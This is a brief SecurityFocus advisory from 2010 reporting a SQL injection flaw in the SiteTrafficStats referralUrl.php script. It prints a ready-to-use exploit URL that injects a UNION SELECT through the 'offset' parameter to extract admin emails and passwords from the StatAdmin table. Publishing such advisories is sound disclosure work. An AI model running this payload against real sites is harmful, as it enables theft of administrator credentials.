SiteTrafficStats ReferralURL.PHP SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example exploit is available:

http://www.example.com/Script_Dir/referralUrl.php?offset=-1/**/UNION%20ALL/**/SELECT%/**/1,2,concat(email,0x3a,password)/**/FROM/**/StatAdmin/*


 

Privacy Statement
Copyright 2010, SecurityFocus